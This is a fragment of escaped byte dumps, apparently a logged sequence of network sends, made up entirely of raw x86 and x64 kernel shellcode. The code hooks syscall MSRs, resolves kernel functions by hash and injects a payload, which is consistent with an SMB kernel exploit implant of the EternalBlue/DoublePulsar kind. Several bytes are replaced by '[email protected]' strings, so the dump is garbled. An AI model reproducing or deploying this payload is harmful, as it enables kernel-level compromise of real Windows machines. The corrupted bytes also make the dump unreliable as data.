\\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 15, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\